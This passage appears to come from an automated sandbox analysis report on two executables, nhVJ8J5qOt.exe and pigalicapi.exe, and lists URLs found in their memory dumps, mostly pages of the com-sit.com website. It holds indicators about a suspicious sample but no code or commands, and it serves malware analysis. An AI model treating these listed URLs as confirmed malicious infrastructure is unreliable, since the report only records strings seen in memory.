00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.646765742.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/administration/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/agb/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/asien/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/blog/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/branchen-know-how/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse-seite/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/code-of-conducts/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comments/feed/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consigment-pakete/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consignment/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/content-supply-management/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/datenschutz/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/decapsulating/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/direktvermarktung/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/diversity/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/en/start-english/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/europa/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/feed/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/hr/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/impressum/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/intelligent-sourcing/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/karriere/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, 